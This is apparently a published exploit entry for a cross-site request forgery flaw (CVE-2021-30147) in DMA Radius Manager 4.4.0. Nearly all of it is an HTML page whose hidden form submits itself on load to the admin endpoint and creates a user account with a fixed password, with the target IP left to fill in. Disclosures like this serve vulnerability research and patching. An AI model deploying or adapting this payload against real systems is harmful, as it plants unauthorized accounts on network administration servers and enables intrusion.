DMA Radius Manager version 4.4.0 suffers from a cross site request forgery vulnerability.
531e4a4445ee19d136af401072188e0d
# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)
# Date: April 8, 2021 (04/08/2021)
# Exploit Author: Issac Briones
# Vendor Homepage: http://www.dmasoftlab.com/
# Software Download: https://sourceforge.net/projects/radiusmanager/
# Version: 4.4.0
# CVE: CVE-2021-30147
<html>
<body>
< ! -- Change IP addr to IP addr that RADIUS manager is located -- >
<form action="http://192.168.1.2/admin.php?cont=store_user" method="POST">
<input type="hidden" name="username" value="csrf_usr" />
<input type="hidden" name="enableuser" value="1" />
<input type="hidden" name="acctype" value="0" />
<input type="hidden" name="password1" value="csrfusr" />
<input type="hidden" name="password2" value="csrfusr" />
<input type="hidden" name="maccm" value="" />
<input type="hidden" name="mac" value="" />
<input type="hidden" name="ipmodecpe" value="0" />
<input type="hidden" name="simuse" value="1" />
<input type="hidden" name="firstname" value="" />
<input type="hidden" name="lastname" value="" />
<input type="hidden" name="company" value="" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="taxid" value="" />
<input type="hidden" name="srvid" value="0" />
<input type="hidden" name="downlimit" value="0" />
<input type="hidden" name="uplimit" value="0" />
<input type="hidden" name="comblimit" value="0" />
<input type="hidden" name="expiration" value="2021-04-06" />
<input type="hidden" name="uptimelimit" value="00:00:00" />
<input type="hidden" name="credits" value="0.00" />
<input type="hidden" name="contractid" value="" />
<input type="hidden" name="contractvalid" value="" />
<input type="hidden" name="gpslat" value="" />
<input type="hidden" name="gpslong" value="" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="superuser" value="{SUPERUSER}" />
<input type="hidden" name="lang" value="English" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="custattr" value="" />
<input type="hidden" name="cnic" value="" />
<input type="hidden" name="cnicfile1" value="(binary)" />
<input type="hidden" name="cnicfile2" value="(binary)" />
<input type="hidden" name="adduser" value="Add user" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>